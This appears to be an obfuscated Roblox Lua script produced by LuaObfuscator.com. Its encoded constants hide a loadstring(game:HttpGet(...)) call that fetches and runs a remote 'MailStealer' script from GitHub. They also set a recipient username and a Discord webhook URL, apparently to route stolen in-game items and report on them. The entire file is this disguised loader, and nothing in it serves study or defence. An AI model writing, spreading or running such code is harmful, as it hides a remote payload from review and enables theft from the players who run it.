--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v5(v82,v19);v19=nil;v88=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -(0 + 0))) -(v32-1)) + 1)) ;return v83-(v83%(2 -1)) ;else local v84=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or ((146 + 781) -(214 + 713)) ;end end local function v21()local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==((3818 -2941) -(282 + 595))) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -(226 + 1044) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v37 * (57 + 199)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + (415 -(87 + 263)))) );v18=v18 + (9 -5) ;return (v41 * (31011612 -14234396)) + (v40 * 65536) + (v39 * (469 -213)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 + 0 ,35 -15 ) * ((2 + 0)^(78 -(191 -145)))) + v42 ;local v46=v20(v43,16 + 5 ,822 -(217 + 151 + 423) );local v47=((v20(v43,127 -95 )==(3 -(7 -5))) and  -(19 -(10 + 8))) or (953 -(802 + 150)) ;if (v46==(0 -0)) then if (v45==(442 -(416 + 26))) then return v47 * (0 -0) ;else v46=1 + 0 ;v44=(3540 -2543) -(915 + (941 -(814 + 45))) ;end elseif (v46==((14281 -8485) -3749)) then return ((v45==(430 -(44 + 386))) and (v47 * ((1 + 0 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/((4 -2)^(113 -61)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(886 -(261 + 624)) );v18=v18 + v48 ;local v50={};for v65=1 -0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (1~=v51) then else v54=nil;v55=nil;v51=2;end if (v51==0) then v52=0 + 0 ;v53=nil;v51=1 + 0 ;end if (v51~=(576 -(507 + 67))) then else v56=nil;v57=nil;v51=1752 -(1013 + 736) ;end if (v51~=(3 + 0)) then else v58=nil;while true do if (v52~=(0 -0)) then else local v94=0;while true do if (v94~=2) then else v52=3 -2 ;break;end if (v94==(867 -(550 + 317))) then v53={};v54={};v94=1;end if ((1 -0)==v94) then v55={};v56={v53,v54,nil,v55};v94=5 -3 ;end end end if (v52~=2) then else local v95=0;while true do if (v95~=(285 -(134 + 151))) then else for v98=1666 -(970 + 695) ,v23() do local v99=0;local v100;local v101;while true do if (v99~=(0 -0)) then else v100=1990 -(582 + 1408) ;v101=nil;v99=3 -2 ;end if (v99==1) then while true do if (v100~=(0 -0)) then else v101=v21();if (v20(v101,1,3 -2 )==(1824 -(1195 + 629))) then local v164=0;local v165;local v166;local v167;local v168;while true do if (v164==0) then v165=0 -0 ;v166=nil;v164=242 -(187 + 54) ;end if (v164~=2) then else while true do if (2~=v165) then else if (v20(v167,781 -(162 + 618) ,1 + 0 )==1) then v168[2]=v58[v168[2]];end if (v20(v167,2 + 0 ,3 -1 )==(1 -0)) then v168[3]=v58[v168[3]];end v165=3;end if (v165~=(0 + 0)) then else local v172=1636 -(1373 + 263) ;while true do if (v172~=(1001 -(451 + 549))) then else v165=1;break;end if (v172==(0 + 0)) then local v181=0;while true do if (v181~=0) then else v166=v20(v101,2,4 -1 );v167=v20(v101,4,6);v181=1 -0 ;end if (v181==1) then v172=1385 -(746 + 638) ;break;end end end end end if (v165~=1) then else local v173=0;while true do if ((0 + 0)==v173) then v168={v22(),v22(),nil,nil};if (v166==0) then local v182=341 -(218 + 123) ;local v183;while true do if (v182~=(1581 -(1535 + 46))) then else v183=0 + 0 ;while true do if (v183==(0 + 0)) then v168[563 -(306 + 254) ]=v22();v168[1 + 3 ]=v22();break;end end break;end end elseif (v166==1) then v168[3]=v23();elseif (v166==2) then v168[5 -2 ]=v23() -(2^(1483 -(899 + 568))) ;elseif (v166~=(2 + 1)) then else local v188=0 -0 ;local v189;local v190;while true do if (v188==(604 -(268 + 335))) then while true do if (v189==(290 -(60 + 230))) then v190=0;while true do if (0==v190) then v168[3]=v23() -((574 -(426 + 146))^16) ;v168[1 + 3 ]=v22();break;end end break;end end break;end if ((1456 -(282 + 1174))==v188) then v189=811 -(569 + 242) ;v190=nil;v188=1;end end end v173=1;end if (v173~=(2 -1)) then else v165=2;break;end end end if (v165~=(1 + 2)) then else if (v20(v167,1027 -(706 + 318) ,1254 -(721 + 530) )~=1) then else v168[4]=v58[v168[4]];end v53[v98]=v168;break;end end break;end if (v164~=(1272 -(945 + 326))) then else v167=nil;v168=nil;v164=2;end end end break;end end break;end end end for v102=2 -1 ,v23() do v54[v102-(1 + 0) ]=v28();end v95=1;end if (1==v95) then return v56;end end end if (v52==1) then local v96=700 -(271 + 429) ;while true do if (v96==0) then v57=v23();v58={};v96=1;end if ((2 + 0)~=v96) then else v52=1502 -(1408 + 92) ;break;end if (v96~=1) then else for v104=1087 -(461 + 625) ,v57 do local v105=0;local v106;local v107;local v108;local v109;while true do if ((1289 -(993 + 295))~=v105) then else v108=nil;v109=nil;v105=1 + 1 ;end if ((1171 -(418 + 753))==v105) then v106=0;v107=nil;v105=1;end if (v105==(1 + 1)) then while true do if (v106~=0) then else local v163=0;while true do if (v163==(1 + 0)) then v106=1;break;end if (v163==(0 + 0)) then v107=0;v108=nil;v163=1;end end end if (v106~=1) then else v109=nil;while true do if (v107==1) then if (v108==1) then v109=v21()~=0 ;elseif (v108==2) then v109=v24();elseif (v108==3) then v109=v25();end v58[v104]=v109;break;end if (v107~=(0 + 0)) then else local v170=0;local v171;while true do if (v170==(529 -(406 + 123))) then v171=1769 -(1749 + 20) ;while true do if (v171~=(0 + 0)) then else v108=v21();v109=nil;v171=1;end if (v171~=(1323 -(1249 + 73))) then else v107=1;break;end end break;end end end end break;end end break;end end end v56[2 + 1 ]=v21();v96=2;end end end end break;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=2) then v77[v79[2]]=v79[3];elseif (v80>3) then local v127=0;local v128;while true do if (v127==0) then v128=v79[2];v77[v128]=v77[v128](v13(v77,v128 + 1 ,v72));break;end end else v77[v79[2]]=v61[v79[3]];end elseif (v80<=7) then if (v80<=5) then do return;end elseif (v80==6) then v71=v79[3];else v77[v79[2]]();end elseif (v80<=8) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==9) then do return;end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=15) then if (v80<=12) then if (v80==11) then local v115=0;local v116;while true do if (0==v115) then v116=v79[2];v77[v116]=v77[v116](v13(v77,v116 + 1 ,v72));break;end end else local v117=0;local v118;local v119;while true do if (v117==0) then v118=v79[2];v119=v77[v79[3]];v117=1;end if (v117==1) then v77[v118 + 1 ]=v119;v77[v118]=v119[v79[4]];break;end end end elseif (v80<=13) then v77[v79[2]]();elseif (v80>14) then local v134=v79[2];local v135,v136=v70(v77[v134](v13(v77,v134 + 1 ,v79[3])));v72=(v136 + v134) -1 ;local v137=0;for v158=v134,v72 do v137=v137 + 1 ;v77[v158]=v135[v137];end else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80==17) then v77[v79[2]]=v61[v79[3]];else v77[v79[2]]=v79[3];end elseif (v80<=19) then local v120=v79[2];local v121,v122=v70(v77[v120](v13(v77,v120 + 1 ,v79[3])));v72=(v122 + v120) -1 ;local v123=0;for v124=v120,v72 do v123=v123 + 1 ;v77[v124]=v121[v123];end elseif (v80==20) then local v144=v79[2];local v145=v77[v79[3]];v77[v144 + 1 ]=v145;v77[v144]=v145[v79[4]];else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703083O00557365724E616D65030A3O004F535F5975737566363103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O363230333432353330363734362O382F64676F5339315A62794950664162314A745036326D6F4C354C6B5246746E332D6D466630674A35556E3451707A525049697570764872656C506A5A642O764B627A65705200153O002O123O00013O0026103O000C0001000200040E3O000C0001001203000100033O001203000200043O002014000200020005002O12000400064O000A000500014O000F000200054O000400013O00022O000700010001000100040E3O001400010026103O00010001000100040E3O00010001001203000100073O003015000100080009001203000100073O0030150001000A000B002O123O00023O00040E3O000100012O00093O00017O00",v9(),...);end
